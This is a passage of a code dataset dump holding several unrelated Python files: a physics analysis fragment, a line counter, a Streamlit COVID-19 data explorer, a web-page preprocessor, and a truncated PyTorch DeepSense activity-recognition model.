Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n counts = np.array(cursor.fetchall()).reshape(-1)\n return counts\n\ndef coincidences_rates(database, label, general_label):\n \"\"\"Return an array of coincidence rates (per day) from EH1-AD1 to EH3-AD4.\n\n Rates are corrected for muon and multiplicity efficiency.\n \"\"\"\n counts = coincidences_counts(database, label)\n daq_livetimes = daq_livetime_days(database, general_label)\n mult_effs = multiplicity_efficiency(database, general_label)\n muon_effs = muon_efficiency(database, general_label)\n rates = counts / mult_effs / muon_effs / daq_livetimes\n return rates\n\ndef target_protons(database, label):\n \"\"\"Return a 2D array of target protons (x1e25) and uncertainties from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n GdLS_kg,\n GdLS_err_kg,\n LS_kg,\n LS_err_kg,\n Acrylic_kg,\n Acrylic_err_kg\n FROM\n target_mass\n ORDER BY\n Hall,\n DetNo\n '''\n )\n masses = np.array(cursor.fetchall())\n cursor.execute('''\n SELECT\n GdLS_density,\n GdLS_err,\n LS_density,\n LS_err,\n Acrylic_density,\n Acrylic_err\n FROM\n proton_densities\n WHERE\n Source = ?\n ''',\n (label,)\n )\n densities = np.array(cursor.fetchall()).reshape(-1)\n num_protons_GdLS = masses[:, 0] * densities[0]\n num_protons_LS = masses[:, 2] * densities[2]\n num_protons_acrylic = masses[:, 4] * densities[4]\n num_protons_total = num_protons_GdLS + num_protons_LS + num_protons_acrylic\n err_GdLS = num_protons_GdLS * np.sqrt(\n (masses[:, 1]/masses[:, 0])**2 + (densities[1]/densities[0])**2\n )\n err_LS = num_protons_LS * np.sqrt(\n (masses[:, 3]/masses[:, 2])**2 + (densities[3]/densities[2])**2\n )\n err_acrylic = num_protons_acrylic * np.sqrt(\n (masses[:, 5]/masses[:, 4])**2 + (densities[5]/densities[4])**2\n )\n err_total = np.sqrt(err_GdLS**2 + err_LS**2 + err_acrylic**2)\n return np.stack((num_protons_total, err_total), axis=-1)\n\n\n","sub_path":"dyb_analysis/event_selection/compute_dataset_summary.py","file_name":"compute_dataset_summary.py","file_ext":"py","file_size_in_byte":8071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"364065323","text":"#! python3\nimport sys, os\n\nlength = len(sys.argv)\nif length == 1:\n\tprint (\"Please specify the file extension, eg: cpp java.\")\n\tsys.exit()\n\ndef countFileLines(filename):\n\tcount = 0\n\twith open (filename, 'rb') as f:\n\t\tfor line in f:\n\t\t\tcount += 1\n\t\n\tprint (\"The line of \" + filename + \" is: \" + str(count))\n\treturn count;\n\ndef countDirFiles(dirpath):\n\tlines = 0\n\tdirs = os.listdir(dirpath)\n\tfor file in dirs:\n\t\tfor i in range(length):\n\t\t\tif i == 0:\n\t\t\t\tcontinue\n\n\t\t\tif (os.path.splitext(file)[1][1:] == str(sys.argv[i])):\n\t\t\t\tlines += countFileLines(dirpath + file)\n\t\t\n\t\tif (os.path.isdir(dirpath + file)):\n\t\t\tlines += countDirFiles(dirpath + file + \"\\\\\")\n\treturn lines;\n\n\npath = os.getcwd() + \"\\\\\"\nprint (\"The total lines is \" + str(countDirFiles(path)))\n\nprint (\"---------------------------\")\n","sub_path":"countlines.py","file_name":"countlines.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"139506770","text":"import copy\r\nimport datetime\r\nimport math\r\nimport os\r\nimport altair as alt\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nfrom matplotlib.backends.backend_agg import RendererAgg\r\nimport plotly.express as px\r\nfrom numpy import nan as Nan\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom plotly.subplots import make_subplots\r\nimport plotly.graph_objects as go\r\nplt.rcParams['figure.figsize'] = 10, 12\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nimport seaborn as sns\r\nfrom PIL import Image\r\n\r\n# todo states where cases and deaths are most and least correlated\r\n\r\n\r\nst.set_page_config(\r\n page_title=\"Covid-19 Forecast and Correlation Explorer\",\r\n layout=\"wide\",\r\n initial_sidebar_state=\"expanded\",\r\n)\r\n\r\n\r\n@st.cache(suppress_st_warning=True)\r\ndef process_data(country):\r\n \"\"\"\r\n Process CSVs. Smooth and compute new series.\r\n :param state: Selected Country\r\n :return: Dataframe\r\n \"\"\"\r\n # Data\r\n df = (pd.read_csv(\"Data/owid-covid-data.csv\")\r\n .sort_values(\"date\", ascending=True)\r\n .reset_index()\r\n .query('location==\"{}\"'.format(country))\r\n )\r\n \r\n df['date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')\r\n df = df.query(\"date >= '2020-03-01' \")\r\n df.set_index(\"date\", inplace=True)\r\n\r\n # Rolling means\r\n df[\"new_tests\"] = df[\"new_tests\"].rolling(7).mean()\r\n df[\"total_deaths\"] = df[\"total_deaths\"].rolling(7).mean()\r\n df[\"new_deaths\"] = df[\"new_deaths\"].rolling(7).mean()\r\n df[\"hosp_patients\"] = df[\"hosp_patients\"].rolling(7).mean()\r\n df[\"total_tests\"] = df[\"total_tests\"].rolling(7).mean()\r\n df[\"icu_patients\"] = df[\"icu_patients\"].rolling(7).mean()\r\n df[\"cardiovasc_death_rate\"] = df[\"cardiovasc_death_rate\"].rolling(7).mean()\r\n df[\"total_cases\"]=df[\"total_cases\"].rolling(7).mean()\r\n\r\n # New features\r\n df[\"percentPositive\"] = (\r\n (df[\"new_tests\"] / df[\"total_tests\"]).rolling(7).mean()\r\n )\r\n \r\n df = calc_prevalence_ratio(df)\r\n\r\n df[\"Infection Fatality Rate\"] = (\r\n df[\"new_deaths\"] / (df[\"new_cases\"] * df[\"prevalence_ratio\"])\r\n ) * 100\r\n df[\"percentPositive\"] = df[\"percentPositive\"] * 100\r\n df[\"Cumulative Recovered Infections Estimate\"] = (\r\n df[\"total_cases\"] * df[\"prevalence_ratio\"] - df[\"total_deaths\"]\r\n )\r\n \r\n if np.inf in df.values:\r\n df = df.replace([np.inf, -np.inf], np.nan).dropna()\r\n return df\r\n\r\n\r\ndef calc_prevalence_ratio(df):\r\n \"\"\"\r\n Calculate prevalence ratio\r\n prevalence_ratio(day_i) = (1250 / (day_i + 25)) * (positivity_rate(day_i))^(0.5) + 2, where day_i is the number of days since February 12, 2020.\r\n https://covid19-projections.com/estimating-true-infections-revisited/\r\n :param df: Dataframe from process_data()\r\n :return: Dataframe with prevalence_ratio column\r\n \"\"\"\r\n\r\n days_since = df.index - datetime.datetime(year=2020, month=2, day=12)\r\n df[\"days_since_feb12\"] = days_since.days.values\r\n p_r_list = []\r\n for i, row in df.iterrows():\r\n try:\r\n prevalence_ratio = (1250 / (row['days_since_feb12'] + 25)) * math.pow(row['percentPositive'], 0.5) + 2\r\n # prevalence_ratio = (1500 / (row[\"days_since_feb12\"] + 50)) * math.pow(\r\n # row[\"percentPositive\"], 0.5\r\n # ) + 2\r\n #prevalence_ratio = (1000 / (row[\"days_since_feb12\"] + 10)) * math.pow(row[\"percentPositive\"], 0.5) + 2\r\n # st.write(prevalence_ratio)\r\n except:\r\n prevalence_ratio = p_r_list[-1]\r\n p_r_list.append(prevalence_ratio)\r\n # st.write(prevalence_ratio)\r\n df[\"prevalence_ratio\"] = p_r_list\r\n return df\r\n\r\n\r\n@st.cache()\r\ndef find_max_correlation(col, col2):\r\n \"\"\"\r\n Take two series and test all alignments for maximum correlation.\r\n :param col: Column 1\r\n :param col2: Column 2\r\n :return: Best r, best shift\r\n \"\"\"\r\n best_cor = -1\r\n best_i = 0\r\n for i in range(len(col) // 5):\r\n col1 = col.shift(i)\r\n correl = col1.corr(col2)\r\n if correl > best_cor:\r\n best_cor = correl\r\n best_i = i\r\n\r\n return best_cor, best_i\r\n\r\n\r\ndef plot_cor(col, col2, best_i, best_cor):\r\n \"\"\"\r\n Plot interactive chart showing correlation between two shifted series.\r\n :param col:\r\n :param col2:\r\n :param best_i:\r\n :param best_cor:\r\n \"\"\"\r\n # st.line_chart({col.name: col.shift(best_i), col2.name: col2})\r\n st.write(\r\n \"{} shifted {} days ahead is correlated with {}. $r={}$\".format(\r\n col.name, best_i, col2.name, round(best_cor, 2)\r\n )\r\n )\r\n\r\n # altair chart\r\n src = pd.DataFrame({col.name: col.shift(best_i), col2.name: col2}).reset_index()\r\n base = alt.Chart(src).encode(alt.X(\"date:T\", axis=alt.Axis(title=None)))\r\n\r\n line = base.mark_line(stroke=\"orange\").encode(\r\n alt.Y(col.name, axis=alt.Axis(title=col.name, titleColor=\"orange\"))\r\n )\r\n\r\n line2 = base.mark_line(stroke=\"#5276A7\").encode(\r\n alt.Y(col2.name, axis=alt.Axis(title=col2.name, titleColor=\"#5276A7\"))\r\n )\r\n\r\n chrt = alt.layer(line, line2).resolve_scale(y=\"independent\")\r\n st.altair_chart(chrt, use_container_width=True)\r\n\r\n\r\n# @st.cache(ttl=TTL)\r\ndef get_shifted_correlations(df, cols):\r\n \"\"\"\r\n Interactive correlation explorer. For two series, finds the alignment that maximizes correlation.\r\n :param df:\r\n :param cols:\r\n :return:\r\n \"\"\"\r\n a = st.selectbox(\"Does this\", cols, index=3)\r\n b = st.selectbox(\"Correlate with this?\", cols, index=2)\r\n lb = st.slider(\r\n \"How far back should we look for correlations?\",\r\n min_value=0,\r\n max_value=len(df),\r\n value=len(df) - 90,\r\n step=10,\r\n format=\"%d days\",\r\n key=\"window2\",\r\n )\r\n\r\n cor, shift = find_max_correlation(df[a].iloc[-lb:], df[b].iloc[-lb:])\r\n col1, col2 = df[a].iloc[-lb:], df[b].iloc[-lb:]\r\n plot_cor(df[a].iloc[-lb:], df[b].iloc[-lb:], shift, cor)\r\n\r\n return cols, a, b, lb\r\n\r\n\r\ndef get_correlations(df, cols):\r\n st.header(\"Correlations\")\r\n df = df[cols]\r\n cor_table = df.corr(method=\"pearson\", min_periods=30)\r\n st.write(cor_table)\r\n max_r = 0\r\n max_idx = None\r\n seen = []\r\n cors = pd.DataFrame(columns=[\"a\", \"b\", \"r\"])\r\n for i in cor_table.index:\r\n for j in cor_table.index:\r\n if i == j or i == \"index\" or j == \"index\":\r\n continue\r\n if cor_table.loc[i, j] == 1:\r\n continue\r\n if cor_table.loc[i, j] > max_r:\r\n max_idx = (i, j)\r\n max_r = max(cor_table.loc[i, j], max_r)\r\n if (j, i) not in seen:\r\n cors = cors.append(\r\n {\"a\": i, \"b\": j, \"r\": cor_table.loc[i, j]}, ignore_index=True\r\n )\r\n seen.append((i, j))\r\n st.write(max_idx, max_r)\r\n st.write(cors.sort_values(\"r\", ascending=False).reset_index(drop=True))\r\n\r\ndef linearRegression(df,country):\r\n selected_columns=['iso_code', 'location', 'date', 'total_cases', 'new_cases', 'total_deaths','new_deaths','icu_patients','hosp_patients','new_tests', 'total_tests', 'total_vaccinations', 'people_vaccinated', 'people_fully_vaccinated', 'new_vaccinations'] \r\n new_df = df.loc[:, selected_columns]\r\n day = df[df['location'] == country].groupby('date')[['total_cases']].sum()\r\n x = np.arange(len(day))\r\n y= day.values\r\n x = x.reshape(-1,1)\r\n model = LinearRegression()\r\n model.fit(x,y)\r\n Yp=model.predict(x) \r\n st.header(f\"Predict COVID Cases trend in {country} using Linear Regression\")\r\n fig = plt.figure() \r\n ax = fig.add_subplot(2,2,1)\r\n ax.scatter(x,y)\r\n ax.plot(x,Yp)\r\n ax.set_xlabel(\"Days\")\r\n ax.set_ylabel(\"Nummber of Cases\")\r\n st.pyplot(fig) \r\n st.header(f\"Predict Vaccination trend in {country} using Linear Regression\")\r\n vac = df[df['location'] == country].groupby('date')[['people_fully_vaccinated']].sum()\r\n x1 = np.arange(len(vac))\r\n y1 = vac.values\r\n x1 =x1.reshape(-1,1)\r\n model.fit(x1,y1)\r\n Yp1=model.predict(x1) \r\n fig = plt.figure()\r\n ax = fig.add_subplot(2,2,2)\r\n ax.scatter(x1,y1)\r\n ax.plot(x1,Yp1)\r\n ax.set_xlabel(\"Days\")\r\n ax.set_ylabel(\"Nummber of People Vaccinated\")\r\n st.pyplot(fig) \r\n\r\n#TimeSeries Analaysis\r\n\r\ndef TimeSeries(country,country1,df):\r\n df_country= df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country))\r\n df_country['date'] = pd.to_datetime(df_country['date'], format='%Y-%m-%d')\r\n df_country = df_country.query(\"date >= '2020-02-01' \") \r\n df_country1 = df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country1))\r\n df_country1['date'] = pd.to_datetime(df_country1['date'], format='%Y-%m-%d')\r\n df_country1 = df_country1.query(\"date >= '2020-02-01' \") \r\n \r\n fig = px.bar(df_country, x=\"date\", y=\"total_cases\", color='total_cases', height=600, title=f'Total Confirmed Coronavirus Cases in {country}',color_discrete_sequence = px.colors.cyclical.IceFire)\r\n st.plotly_chart(fig)\r\n fig = px.bar(df_country1, x=\"date\", y=\"total_cases\", color='total_cases', orientation='v', height=600,\r\n title=f'Total Confirmed Coronavirus Cases in {country1}', color_discrete_sequence = px.colors.cyclical.IceFire)\r\n\r\n st.plotly_chart(fig)\r\n \r\ndef cumulativeCases(country1,country2,df):\r\n df_country1= df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country1))\r\n df_country1['date'] = pd.to_datetime(df_country1['date'], format='%Y-%m-%d')\r\n df_country1 = df_country1.query(\"date >= '2020-02-01' \") \r\n df_country2 = df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country2))\r\n df_country2['date'] = pd.to_datetime(df_country2['date'], format='%Y-%m-%d')\r\n fig = make_subplots(\r\n rows=2, cols=2,\r\n specs=[[{}, {}],\r\n [{\"colspan\": 2}, None]],\r\n subplot_titles=(country1,country2))\r\n\r\n fig.add_trace(go.Bar(x=df_country1['date'], y=df_country1['total_cases'],\r\n marker=dict(color=df_country1['total_cases'], coloraxis=\"coloraxis\")),1, 1)\r\n\r\n fig.add_trace(go.Bar(x=df_country2['date'], y=df_country2['total_cases'],\r\n marker=dict(color=df_country2['total_cases'], coloraxis=\"coloraxis\")),1, 2)\r\n \r\n fig.update_layout(coloraxis=dict(colorscale='Bluered_r'), showlegend=False,title_text=\"Total Confirmed cases(Cumulative)\")\r\n\r\n fig.update_layout(plot_bgcolor='rgb(230, 230, 230)')\r\n st.plotly_chart(fig)\r\n\r\ndef covidTrend(country1,country2,df): \r\n df_country1= df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country1))\r\n df_country1['date'] = pd.to_datetime(df_country1['date'], format='%Y-%m-%d')\r\n df_country1 = df_country1.query(\"date >= '2020-02-01' \") \r\n df_country2 = df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country2))\r\n df_country2['date'] = pd.to_datetime(df_country2['date'], format='%Y-%m-%d') \r\n fig = make_subplots(rows=2, cols=2, specs=[[{}, {}], [{\"colspan\": 2}, None]], subplot_titles=(country1,country2))\r\n fig.add_trace(go.Scatter(x=df_country1['date'], y=df_country2['new_cases'], marker=dict(color=df_country1['total_cases'], coloraxis=\"coloraxis\")), 1, 1)\r\n fig.add_trace(go.Scatter(x=df_country2['date'], y=df_country2['new_cases'], marker=dict(color=df_country2['total_cases'], coloraxis=\"coloraxis\")), 1, 2)\r\n fig.update_layout(coloraxis=dict(colorscale='Bluered_r'), showlegend=False,title_text=\"Trend of New Coronavirus cases\")\r\n fig.update_layout(plot_bgcolor='rgb(250, 242, 242)')\r\n st.plotly_chart(fig)\r\n\r\ndef explorerData(df_country):\r\n st.title(\"Welcome to the Covid-19 Tracker Application\")\r\n st.markdown(\"\"\" \r\n \"\"\")\r\n # Summary Table\r\n\r\n st.header(f'Summary Table for the last {table_days} days.')\r\n \r\n st.markdown(\"\"\" This table includes the number of cases, deaths, new cases and moving average for your selection.\"\"\")\r\n\r\n #st.write(df_county.iloc[-table_days:,-4:])\r\n\r\n a = df_country.iloc[-table_days:, -4:]\r\n \r\n my_table = st.table(a)\r\n\r\n\r\n # Total Cases Graph\r\n\r\n st.header(f'Total Cases for {country}.')\r\n \r\n total_cases_chart = df_country['total_cases']\r\n\r\n \r\n st.line_chart(total_cases_chart)\r\n\r\n \r\n # Moving Average Graph\r\n\r\n st.header(f'{moving_average_day} moving average for {country}.')\r\n \r\n moving_average_chart = df_country['moving_average']\r\n \r\n st.line_chart(moving_average_chart)\r\n\r\n \r\n # Death Graph\r\n\r\n st.header(f'Total Deaths for {country}.')\r\n \r\n total_deaths_chart = df_country['total_deaths']\r\n \r\n st.line_chart(total_deaths_chart) \r\n\r\n#Solidity Example\r\n\r\n#main function\r\nif __name__ == \"__main__\": \r\n # todo global cols lists. One for cors and one for UI\r\n cols = [\r\n \"Infection Fatality Rate\",\r\n \"new_cases\",\r\n \"new_deaths\",\r\n \"hosp_patients\",\r\n \"icu_patients\",\r\n \"percentPositive\",\r\n \"total_tests\", \r\n ] \r\n \r\n w, h, = (\r\n 900,\r\n 400,\r\n )\r\n df_covid= pd.read_csv(\"Data/owid-covid-data.csv\")\r\n countries = pd.read_csv(\"Data/owid-covid-data.csv\")[\"location\"].unique()\r\n\r\n with st.sidebar:\r\n st.title(\"Covid-19 Data Explorer\")\r\n st.subheader(\"Select a page below:\")\r\n mode = st.radio(\r\n \"Menu\",\r\n [\r\n \"COVID Explorer\",\r\n \"Correlation Explorer\",\r\n \"Linear Regression\",\r\n \"TimeSeries Analysis\",\r\n \"BlockVax\"\r\n ],\r\n )\r\n st.subheader(\"Select a Country:\") \r\n country = st.selectbox(\"\",countries, index=37)\r\n\r\n # https://docs.streamlit.io/en/stable/troubleshooting/caching_issues.html#how-to-fix-the-cached-object-mutated-warning\r\n df = copy.deepcopy(process_data(country)) \r\n\r\n if mode == \"COVID Explorer\": \r\n st.sidebar.header(\"Covid-19 Data Explorer\") \r\n #country = st.sidebar.selectbox('Select Your Country:',countries) \r\n table_days = st.sidebar.slider('Select the number of days you want to be display in the Summary Table. ', min_value = 3, max_value= 15, value= 5, step=1)\r\n moving_average_day = st.sidebar.slider('How many days to consider for the moving average? ', min_value = 5, max_value = 14, value = 7, step=1)\r\n # Creating the dataframe for the country\r\n df_country = df_covid[(df_covid.location == country)].copy()\r\n \r\n #Create a new column for 7-day moving average\r\n df_country['moving_average'] = df_country.loc[:,'new_cases'].rolling(window=moving_average_day).mean()\r\n if (country != \"\"):\r\n explorerData(df_country)\r\n elif mode == \"Correlation Explorer\":\r\n st.title(\"Interactive Correlation Explorer\")\r\n st.write(\"Choose two variables and see if they are correlated.\")\r\n cols, a, b, lookback = get_shifted_correlations(df, cols) \r\n elif mode ==\"Linear Regression\": \r\n linearRegression(df_covid,country)\r\n elif mode ==\"TimeSeries Analysis\": \r\n st.sidebar.subheader(\"Select a Comparison Country:\") \r\n country1 = st.sidebar.selectbox(\"\",countries, index=45)\r\n if (country == country1):\r\n st.write(\"Please select different Comparison Country\")\r\n elif (country != \"\" and country1 !=\"\"):\r\n TimeSeries(country,country1,df_covid)\r\n #cumulativeCases(country,country1,df_covid)\r\n covidTrend(country,country1,df_covid)\r\n elif mode == \"BlockVax\":\r\n st.title(\"Introducing BlockVax - Profile and Vaccine Data Registration\")\r\n st.subheader(\"\\n\")\r\n \r\n st.markdown(\"\"\"\r\n BlockVax is a smart contract which interacts with the ethereum network to allow users to register a profile for themselves or others, generating a unique patient ID number and storing the profile data in a profile struct as part of a mapping. Their profile registration will require their address as well as a photo ID, which will be uploaded to [pinata](https://pinata.cloud/) and stored via an IPFS hash.\r\n \"\"\")\r\n img = Image.open(\"Images\\image1.png\")\r\n st.image(img, width=200) \r\n st.image(\"Images\\image2.png\", width=200)\r\n \r\n \r\n st.markdown(\"\"\" \r\n Once a profile has been created, registered vaccine providers are able to update vaccine data of vaccinated patients by using the patient's address and ID number and photo URI as part of our token JSON scehma shown below. \"\"\")\r\n \r\n st.image(\"Images\\image3.png\", width=200)\r\n \r\n \r\n st.write(\"This function will then mint a non-fungible token using the patient's address and ID number and set the token URI, as well as update the patient's profile with the vaccine data.\") \r\n st.image(\"Images\\image4.png\", width=200)\r\n \r\n st.write(\"Modifier's were created to restrsict function access and to ensure only the right data can be inputted, since this contract interacts with a blockchain and hence immutable, we do not want to waste gas fees on data errors or accidentally input incorrect data.\")\r\n \r\n st.markdown(\"\"\" Requirements include:\r\n * Restriction of provider function use to only providers registered in the contract\r\n * The vaccine name having to match our stored vaccine names\r\n * Only valid patient IDs\r\n * Only registered/valid patient addresses can be inputted\r\n \"\"\")\r\n st.image(\"Images\\image5.png\", width=200)\r\n \r\n st.image(\"Images\\image6.png\", width=200)\r\n \r\n st.markdown(\"\"\"Finally, our last function allows the user to search for a patient ID and check if they've been vaccinated. \r\n \"\"\")\r\n st.image(\"Images\\image7.png\", width=200)\r\n","sub_path":"finalmain.py","file_name":"finalmain.py","file_ext":"py","file_size_in_byte":18435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"216003634","text":"\n\n\nimport WebMirror.PreProcessors.PreProcessorBase\nimport urllib.parse\nimport bs4\nimport WebRequest\n\n\n\nclass CreativeNovelsPreprocessor(WebMirror.PreProcessors.PreProcessorBase.ContentPreprocessor):\n\n\tloggerPath = \"Main.Preprocessor.JsRenderer\"\n\n\tdef preprocessContent(self, url, mimetype, contentstr):\n\t\tif mimetype != 'text/html':\n\t\t\treturn contentstr\n\n\t\tif isinstance(contentstr, bytes):\n\t\t\tcontentstr = bs4.UnicodeDammit(contentstr).unicode_markup\n\n\t\tsoup = WebRequest.as_soup(contentstr)\n\t\tnext_chp_links = soup.find_all(\"a\", class_='nextkey')\n\t\tprev_chp_links = soup.find_all(\"a\", class_='prevkey')\n\n\t\tfor tag in next_chp_links:\n\t\t\ttag.string = \"Next chapter\"\n\t\tfor tag in prev_chp_links:\n\t\t\ttag.string = \"Previous chapter\"\n\n\t\tfor bogus in soup.find_all(\"div\", class_='x-modal-content'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='wpdiscuz_unauth'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='wpd-default'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='imagepost'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='donation'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"form\", class_='x-search'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"ul\", class_='x-menu'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='comments-area'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='respond'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='x-bar-space-v'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='e23-20'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"button\"):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"a\", id='wpdUserContentInfoAnchor'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", id='wpdUserContentInfo'):\n\t\t\tbogus.decompose()\n\n\t\tappends = []\n\t\tfor item in soup.find_all('div', class_='togglepost'):\n\t\t\t# print(\"found append\")\n\t\t\tappends.append(item.extract())\n\n\t\ttgtdiv = soup.find(\"article\", class_='post')\n\n\t\tif tgtdiv:\n\t\t\ttgtdiv = tgtdiv.parent.parent\n\t\t\ttgtdiv.append(soup.new_tag('hr'))\n\t\t\tfor append in appends:\n\t\t\t\t# print(\"Appending:\", append)\n\t\t\t\ttgtdiv.append(append)\n\n\t\t# There should only ever be one of these.\n\t\tfor mature_div in soup.find_all(\"div\", class_='include_content_rating'):\n\t\t\tfor item in mature_div.find_all('div', class_='list-group-item'):\n\t\t\t\titem.decompose()\n\n\t\treturn soup.prettify()\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tnetloc = urllib.parse.urlsplit(url).netloc\n\t\tif netloc.lower().endswith(\"creativenovels.com\"):\n\t\t\tprint(\"CreativeNovelsPreprocessor wants URL: %s\" % url)\n\t\t\treturn True\n\n\t\treturn False\n","sub_path":"WebMirror/PreProcessors/CreativeNovelsPreprocess.py","file_name":"CreativeNovelsPreprocess.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"555686887","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport math\n\nSEPCTURAL_SAMPLES = 10\nFEATURE_DIM = SEPCTURAL_SAMPLES * 6 * 2\nCONV_LEN = 3\nCONV_LEN_INTE = 3 # 4\nCONV_LEN_LAST = 3 # 5\nCONV_NUM = 64\nCONV_MERGE_LEN = 8\nCONV_MERGE_LEN2 = 6\nCONV_MERGE_LEN3 = 4\nCONV_NUM2 = 64\nINTER_DIM = 120\nOUT_DIM = 6 # len(idDict)\nWIDE = 20\n\n\n###### Import training data\n\n\nclass SingleSensorTransformer(nn.Module):\n def __init__(self, args, n_feature=3):\n super(SingleSensorTransformer, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=CONV_NUM,\n kernel_size=(2 * 3 * CONV_LEN, 1), stride=(2 * 3, 1), padding=0)\n self.batch_norm1 = nn.BatchNorm2d(CONV_NUM)\n\n self.relu1 = nn.ReLU()\n self.dropout1 = nn.Dropout(p=args.dropout)\n\n self.conv2 = nn.Conv2d(in_channels=CONV_NUM, out_channels=CONV_NUM,\n kernel_size=(CONV_LEN_INTE, 1), stride=(1, 1), padding=0)\n self.batch_norm2 = nn.BatchNorm2d(CONV_NUM)\n self.relu2 = nn.ReLU()\n self.dropout2 = nn.Dropout(p=args.dropout)\n\n self.conv3 = nn.Conv2d(in_channels=CONV_NUM, out_channels=CONV_NUM,\n kernel_size=(CONV_LEN_LAST, 1), stride=(1, 1), padding=0)\n self.batch_norm3 = nn.BatchNorm2d(CONV_NUM)\n self.relu3 = nn.ReLU()\n\n def forward(self, x):\n \"\"\"\n\n :param x: b(batch, channel, length)\n :return:\n \"\"\"\n # Assume that x (batch, wide, feature_dim, channel=1)\n\n # (batch, wide, feature_dim, channel = 1)\n x = self.conv1(x)\n x = self.batch_norm1(x)\n x = self.relu1(x)\n x = self.dropout1(x)\n\n x = self.conv2(x)\n x = self.batch_norm2(x)\n x = self.relu2(x)\n x = self.dropout2(x)\n\n x = self.conv3(x)\n x = self.batch_norm3(x)\n x = self.relu3(x)\n return x\n\n\nclass MultipSensorTransformer(nn.Module):\n def __init__(self, args):\n super(MultipSensorTransformer, self).__init__()\n n_feature = CONV_NUM * 3\n self.conv1 = nn.Conv2d(in_channels=CONV_NUM * 3, out_channels=CONV_NUM2,\n kernel_size=(2 * 3 * CONV_LEN, 1), stride=(CONV_MERGE_LEN, 1), padding=0)\n self.batch_norm1 = nn.BatchNorm2d(CONV_NUM2)\n\n self.relu1 = nn.ReLU()\n self.dropout1 = nn.Dropout(p=args.dropout)\n\n self.conv2 = nn.Conv2d(in_channels=CONV_NUM2, out_channels=CONV_NUM2,\n kernel_size=(CONV_LEN_INTE, 1), stride=(CONV_MERGE_LEN2, 1), padding=0)\n self.batch_norm2 = nn.BatchNorm2d(CONV_NUM2)\n self.relu2 = nn.ReLU()\n self.dropout2 = nn.Dropout(p=args.dropout)\n\n self.conv3 = nn.Conv2d(in_channels=CONV_NUM2, out_channels=CONV_NUM2,\n kernel_size=(CONV_LEN_LAST, 1), stride=(CONV_MERGE_LEN3, 1), padding=0)\n self.batch_norm3 = nn.BatchNorm2d(CONV_NUM2)\n self.relu3 = nn.ReLU()\n\n def forward(self, x):\n # Assume that x (batch, wide, feature_dim, channel=1)\n x = self.dropout1(x)\n x = self.conv1(x)\n x = self.batch_norm1(x)\n x = self.relu1()\n\n x = self.dropout2(x)\n x = self.conv2(x)\n x = self.batch_norm2(x)\n x = self.relu2()\n\n x = self.dropout3(x)\n x = self.conv3(x)\n x = self.batch_norm3(x)\n x = self.relu3()\n\n return x\n\n\n# Define the model\nclass DeepSense(nn.Module):\n def __init__(self, args, n_feature, n_class):\n super(DeepSense, self).__init__()\n w = args.window_size\n p = self.tpoint = args.tpoint\n\n self.n_class = n_class\n self.n_feature = n_feature\n self.hidden_size = args.unit\n dropout = args.dropout\n if w % args.tpoint == 0:\n self.rnn_step = w / p\n else:\n self.rnn_step = w / p + 1\n padding_size = self.rnn_step * p - w\n self.padding = nn.ZeroPad2d((0, 0, padding_size, 0))\n\n # print(' | Input dim: %d' % (self.input_dim))\n # print(' | RNN step: %d' % (self.rnn_step))\n # print(' | Tpoint step: %d' % (p))\n # print(' | Feature: %d' % (n_feature))\n # print(' | Padding: %d' % (padding_size))\n # print(' | RNN layer: %d' % (args.layer))\n self.n_class = n_class\n\n self.acce_shoe_net = SingleSensorTransformer(args, n_feature=3)\n self.acce_watch_net = SingleSensorTransformer(args, n_feature=3)\n self.gyro_net = SingleSensorTransformer(args, n_feature=3)\n\n self.sensor_net = MultipSensorTransformer(args)\n\n self.rnn = nn.GRU(self.hidden_size, self.hidden_size, num_layers=2,\n dropout=dropout, batch_first=True, bidirectional=False)\n\n self.dense =nn.Linear(self.hidden_size, self.n_class)\n\n def forward(self, x, hidden=None):\n \"\"\"\n\n :param x: batch_size x (tpoint_per_step * recurrent_step) x n_feature\n :param hidden:\n :return:\n \"\"\"\n print('-')\n\n print(x.shape)\n # Split into three parts\n # (batch, length, feature_dim) -> (batch, channel=1, length, feature_dim)\n x = 